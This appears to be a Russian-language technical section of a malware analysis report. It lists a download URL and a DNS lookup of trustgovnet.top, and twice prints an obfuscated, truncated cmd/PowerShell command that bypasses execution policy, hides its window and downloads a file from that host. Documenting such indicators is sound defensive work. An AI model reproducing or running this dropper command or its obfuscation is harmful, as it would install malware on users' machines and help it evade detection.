Техническая информация
- http://trustgovnet.top/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "Po^w^E^R^S^hELL.ExE^ -^Ex^EcuT^io^np^ol^iCy BYPAss -N^O^P^RofIl^E ^-wi^nDOWsTyLe^ HI^dd^eN (nEW-o^B^j^ECT^ ^s^y^sTeM.^Ne^t^.weBc^lIe^NT)^.^doWNlOadfiLe('http://trustgovnet.top...
- DNS ASK tr###govnet.top
- '<SYSTEM32>\cmd.exe' /c "Po^w^E^R^S^hELL.ExE^ -^Ex^EcuT^io^np^ol^iCy BYPAss -N^O^P^RofIl^E ^-wi^nDOWsTyLe^ HI^dd^eN (nEW-o^B^j^ECT^ ^s^y^sTeM.^Ne^t^.weBc^lIe^NT)^.^doWNlOadfiLe('http://trustgovnet.top...' (со скрытым окном)